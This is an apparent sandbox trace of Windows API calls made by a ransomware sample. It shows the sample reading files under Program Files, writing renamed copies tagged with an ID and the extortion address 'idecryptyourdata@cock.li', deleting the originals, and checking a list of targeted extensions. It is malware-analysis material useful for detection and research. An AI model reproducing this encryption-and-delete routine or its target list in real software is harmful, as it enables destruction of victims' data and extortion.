[0179.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.407] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.368] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.368] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0181.369] GetLastError () returned 0x0 [0181.369] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xb54, lpOverlapped=0x0) returned 1 [0181.442] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xb60, lpOverlapped=0x0) returned 1 [0181.443] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.443] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.443] SetEndOfFile (hFile=0x380) returned 1 [0181.443] CloseHandle (hObject=0x380) returned 1 [0181.444] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.444] SetEndOfFile (hFile=0x334) returned 1 [0181.444] CloseHandle (hObject=0x334) returned 1 [0181.444] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.445] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf")) returned 1 [0181.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.445] lstrlenW (lpString=".doc") returned 4 [0181.445] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.445] lstrlenW (lpString=".docx") returned 5 [0181.445] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0181.445] lstrlenW (lpString=".pdf") returned 4 [0181.445] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.445] lstrlenW (lpString=".xls") returned 4 [0181.445] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.445] lstrlenW (lpString=".xlsx") returned 5 [0181.445] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0181.445] lstrlenW (lpString=".ppt") returned 4 [0181.445] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.445] lstrlenW (lpString=".zip") returned 4 [0181.446] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.446] lstrlenW (lpString=".rar") returned 4 [0181.446] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.446] lstrlenW (lpString=".bz2") returned 4 [0181.446] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.446] lstrlenW (lpString=".7z") returned 3 [0181.446] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.446] lstrlenW (lpString=".dbf") returned 4 [0181.446] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.446] lstrlenW (lpString=".1cd") returned 4 [0181.446] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.446] lstrlenW (lpString=".jpg") returned 4 [0181.446] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.446] lstrlenW (lpString=".doc") returned 4 [0181.446] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.446] lstrlenW (lpString=".docx") returned 5 [0181.446] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0181.446] lstrlenW (lpString=".pdf") returned 4 [0181.446] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.446] lstrlenW (lpString=".xls") returned 4 [0181.446] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.446] lstrlenW (lpString=".xlsx") returned 5 [0181.446] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0181.446] lstrlenW (lpString=".ppt") returned 4 [0181.446] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.446] lstrlenW (lpString=".zip") returned 4 [0181.446] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.447] lstrlenW (lpString=".rar") returned 4 [0181.447] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.447] lstrlenW (lpString=".bz2") returned 4 [0181.447] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.447] lstrlenW (lpString=".7z") returned 3 [0181.447] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.447] lstrlenW (lpString=".dbf") returned 4 [0181.447] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.447] lstrlenW (lpString=".1cd") returned 4 [0181.447] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF") returned 68 [0181.447] lstrlenW (lpString=".jpg") returned 4 [0181.447] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.447] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.447] lstrlenW (lpString="J0105360.WMF") returned 12 [0181.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0181.448] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=8860) returned 1 [0181.448] CloseHandle (hObject=0x334) returned 1 [0181.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf")) returned 0x220 [0181.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0181.448] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.448] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0181.449] GetLastError () returned 0x0 [0181.449] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x229c, lpOverlapped=0x0) returned 1 [0181.579] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x22a0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x22a0, lpOverlapped=0x0) returned 1 [0181.580] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.581] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.581] SetEndOfFile (hFile=0x380) returned 1 [0181.581] CloseHandle (hObject=0x380) returned 1 [0181.581] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.581] SetEndOfFile (hFile=0x334) returned 1 [0181.582] CloseHandle (hObject=0x334) returned 1 [0181.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.582] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf")) returned 1 [0181.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.582] lstrlenW (lpString=".doc") returned 4 [0181.582] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.582] lstrlenW (lpString=".docx") returned 5 [0181.582] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0181.582] lstrlenW (lpString=".pdf") returned 4 [0181.582] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.582] lstrlenW (lpString=".xls") returned 4 [0181.582] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.582] lstrlenW (lpString=".xlsx") returned 5 [0181.582] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0181.582] lstrlenW (lpString=".ppt") returned 4 [0181.582] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.583] lstrlenW (lpString=".zip") returned 4 [0181.583] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.583] lstrlenW (lpString=".rar") returned 4 [0181.583] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString=".bz2") returned 4 [0181.583] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString=".7z") returned 3 [0181.583] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.583] lstrlenW (lpString=".dbf") returned 4 [0181.583] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.583] lstrlenW (lpString=".1cd") returned 4 [0181.583] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.583] lstrlenW (lpString=".jpg") returned 4 [0181.583] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.583] lstrlenW (lpString=".doc") returned 4 [0181.583] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString=".docx") returned 5 [0181.583] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0181.583] lstrlenW (lpString=".pdf") returned 4 [0181.583] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString=".xls") returned 4 [0181.583] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.583] lstrlenW (lpString=".xlsx") returned 5 [0181.583] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0181.583] lstrlenW (lpString=".ppt") returned 4 [0181.583] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.583] lstrlenW (lpString=".zip") returned 4 [0181.583] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.583] lstrlenW (lpString=".rar") returned 4 [0181.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.584] lstrlenW (lpString=".bz2") returned 4 [0181.584] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.584] lstrlenW (lpString=".7z") returned 3 [0181.584] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.584] lstrlenW (lpString=".dbf") returned 4 [0181.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.584] lstrlenW (lpString=".1cd") returned 4 [0181.584] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF") returned 68 [0181.584] lstrlenW (lpString=".jpg") returned 4 [0181.584] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.584] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.584] lstrlenW (lpString="J0105378.WMF") returned 12 [0181.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0181.585] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=4964) returned 1 [0181.585] CloseHandle (hObject=0x334) returned 1 [0181.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf")) returned 0x220 [0181.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0181.585] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.585] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0181.586] GetLastError () returned 0x0 [0181.586] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1364, lpOverlapped=0x0) returned 1 [0181.936] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1370, lpOverlapped=0x0) returned 1 [0181.937] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.937] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.937] SetEndOfFile (hFile=0x380) returned 1 [0181.937] CloseHandle (hObject=0x380) returned 1 [0181.937] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.937] SetEndOfFile (hFile=0x334) returned 1 [0181.938] CloseHandle (hObject=0x334) returned 1 [0181.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.938] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf")) returned 1 [0181.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.939] lstrlenW (lpString=".doc") returned 4 [0181.939] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.939] lstrlenW (lpString=".docx") returned 5 [0181.939] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.939] lstrlenW (lpString=".pdf") returned 4 [0181.939] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.939] lstrlenW (lpString=".xls") returned 4 [0181.939] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.939] lstrlenW (lpString=".xlsx") returned 5 [0181.939] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.939] lstrlenW (lpString=".ppt") returned 4 [0181.939] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.939] lstrlenW (lpString=".zip") returned 4 [0181.939] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.939] lstrlenW (lpString=".rar") returned 4 [0181.939] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.939] lstrlenW (lpString=".bz2") returned 4 [0181.939] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.939] lstrlenW (lpString=".7z") returned 3 [0181.939] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.939] lstrlenW (lpString=".dbf") returned 4 [0181.939] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.939] lstrlenW (lpString=".1cd") returned 4 [0181.939] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.939] lstrlenW (lpString=".jpg") returned 4 [0181.939] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.940] lstrlenW (lpString=".doc") returned 4 [0181.940] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.940] lstrlenW (lpString=".docx") returned 5 [0181.940] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.940] lstrlenW (lpString=".pdf") returned 4 [0181.940] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.940] lstrlenW (lpString=".xls") returned 4 [0181.940] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.940] lstrlenW (lpString=".xlsx") returned 5 [0181.940] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.940] lstrlenW (lpString=".ppt") returned 4 [0181.940] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.940] lstrlenW (lpString=".zip") returned 4 [0181.940] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.940] lstrlenW (lpString=".rar") returned 4 [0181.940] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.940] lstrlenW (lpString=".bz2") returned 4 [0181.940] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.940] lstrlenW (lpString=".7z") returned 3 [0181.940] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.941] lstrlenW (lpString=".dbf") returned 4 [0181.941] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.941] lstrlenW (lpString=".1cd") returned 4 [0181.941] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF") returned 68 [0181.941] lstrlenW (lpString=".jpg") returned 4 [0181.941] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.941] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.941] lstrlenW (lpString="J0105390.WMF") returned 12 [0181.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0181.942] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=4944) returned 1 [0181.942] CloseHandle (hObject=0x334) returned 1 [0181.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf")) returned 0x220 [0181.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0181.942] SetFilePointerEx (in: hFile=0x334, 